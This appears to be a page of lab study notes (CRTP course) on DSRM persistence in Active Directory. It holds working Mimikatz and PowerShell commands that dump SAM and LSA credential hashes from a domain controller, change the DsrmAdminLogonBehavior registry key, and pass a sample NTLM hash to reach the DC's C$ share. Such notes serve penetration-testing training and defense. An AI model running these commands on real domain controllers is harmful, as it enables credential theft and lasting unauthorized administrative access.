DSRM

If we have admin privileges on a DC, we can dump local admin hash and then activate this local admin user to remotely access it.

DSRM (Directory Services Restore Mode)

When the AD domain services does not boot, it uses a safe mode called DSRM that uses a local administrator user on DC called "Administrator" who's password is the DSRM password.
DSRM password (SafeModePassword) is required when a server is promoted to DC and it is rarely changed. After altering the config on the DC, it is possible to pass the NTLM hash of this user to access the DC.
This is longest persistence method.
The domain DPAPI backup key can be used to decrypt DPAPI protected credentials for any user.

Dump credentials (requires DA privs)

# Copy InvokeMimi to DC
$sess = New-PSSession dcorp-dc
Enter-PSSession -Session $sess
Invoke-Command -FilePath C:\AD\Tools\Invoke-Mimi.ps1 -Session $sess


Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcorp-dc

Compare the Administrator hash with the Administrator hash of below command:

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcorp-dc

First one is the DSRM local Adminstrator.

Since it is local admin of the DC, we can pass the hash to authenticate.

Before PTH, we need to change the Logon Behavior for the DSRM account (very noisy)

Enter-PSSession -Computername dcorp-dc

#Check if the key exists and get the value
Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior

# Change Registry key on DC
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Pass the hash

# On attacker machine
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd /run:powershell.exe"'

# Or access C$
ls \\dcorp-dc\C$

PreviousSkeleton Key NextCRTP Lab 11

Last updated 2 months ago